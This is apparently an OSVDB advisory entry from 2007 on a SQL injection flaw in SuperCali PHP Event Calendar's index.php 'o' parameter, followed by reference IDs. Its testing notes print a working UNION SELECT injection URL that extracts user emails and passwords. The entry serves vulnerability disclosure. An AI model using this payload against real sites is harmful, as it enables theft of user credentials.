SuperCali PHP Event Calendar index.php o Variable SQL Injection

2007-07-03T00:00:00
ID OSVDB:36300
Type osvdb
Reporter xprog(), t0pP8uZz()
Modified 2007-07-03T00:00:00

Description

Manual Testing Notes

http://[target]/index.php?o=-1//UNION//ALL//SELECT//1,2,concat(email,0x3a,password),4,5,0x677269642E706870//from//users/*

References:

Secunia Advisory ID:25921 Other Advisory URL: http://milw0rm.com/exploits/4141 ISS X-Force ID: 35252 FrSIRT Advisory: ADV-2007-2431 CVE-2007-3582 Bugtraq ID: 24756